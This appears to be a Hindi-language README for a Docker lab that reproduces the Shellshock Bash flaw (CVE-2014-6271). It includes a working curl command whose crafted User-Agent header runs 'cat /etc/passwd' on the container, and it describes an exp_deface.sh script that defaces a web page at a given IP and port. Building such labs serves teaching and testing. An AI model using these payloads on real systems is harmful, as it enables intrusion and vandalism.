
CVE (ShellShock) की प्रस्तुति परियोजना, पीडीएफ, तकनीकी प्रदर्शन और पुनरुत्पादनीयता के साथ।
यह प्रोजेक्ट CVE-2014-6271 नामक कमजोरी को पुन: उत्पन्न करने की अनुमति देता है, जिसे Shellshock के नाम से भी जाना जाता है। Shellshock Bash में एक सुरक्षा कमजोरी है जो पर्यावरण चरों के माध्यम से दुर्भावनापूर्ण कोड निष्पादित करने की अनुमति देती है।
इस प्रोजेक्ट का उद्देश्य Docker वातावरण पर इस कमजोरी के प्रभाव को प्रदर्शित करना है।
शुरू करने से पहले, सुनिश्चित करें कि आपकी मशीन पर Docker स्थापित है। आप Docker यहाँ से डाउनलोड कर सकते हैं।
प्रोजेक्ट निर्देशिका में, निम्नलिखित कमांड चलाकर Docker इमेज बनाएँ:
docker build -t ['image name'] .
['image name'] को उस नाम से बदलें जो आप Docker इमेज को देना चाहते हैं।
इमेज बन जाने के बाद, निम्नलिखित कमांड से इस इमेज से एक कंटेनर चलाएँ:
docker run -it --rm -p 8080:80 ['image name']
यह आपकी स्थानीय मशीन के पोर्ट 8080 पर सेवा को उजागर करेगा।
अपना ब्राउज़र खोलें और http://localhost:8080 पर पहुँचें। आप एप्लिकेशन के व्यवहार का निरीक्षण कर सकेंगे और कमजोरी का परीक्षण कर सकेंगे।
दूसरे टर्मिनल में, कमजोरी का शोषण करने और /etc/passwd फ़ाइल की सामग्री पढ़ने के लिए निम्नलिखित कमांड चलाएँ:
curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd'" \
http://localhost:8080/cgi-bin/vulnerable
यह कमांड Shellshock का शोषण करने के लिए विशेष रूप से डिज़ाइन किया गया user-agent हेडर भेजता है। यदि कमजोरी सही ढंग से पुन: उत्पन्न होती है, तो /etc/passwd की सामग्री टर्मिनल आउटपुट में प्रदर्शित होगी।
यह स्क्रिप्ट कमजोरी का शोषण करके किसी लक्षित वेब पेज को विकृत (deface) करने की अनुमति देता है। यह कमजोरी CGI स्क्रिप्ट्स के गलत कॉन्फ़िगरेशन पर आधारित है, जो सर्वर पर मनमाने कमांड्स के निष्पादन की अनुमति देता है।
आवश्यक शर्तें:
./exp_deface.sh <ip> <port>
./exp_deface.sh localhost 8080
महत्वपूर्ण: इस कमजोरी का उपयोग केवल नियंत्रित वातावरण में परीक्षण और प्रदर्शन उद्देश्यों के लिए किया जाना चाहिए। इस प्रोजेक्ट का उपयोग उत्पादन वातावरण में न करें।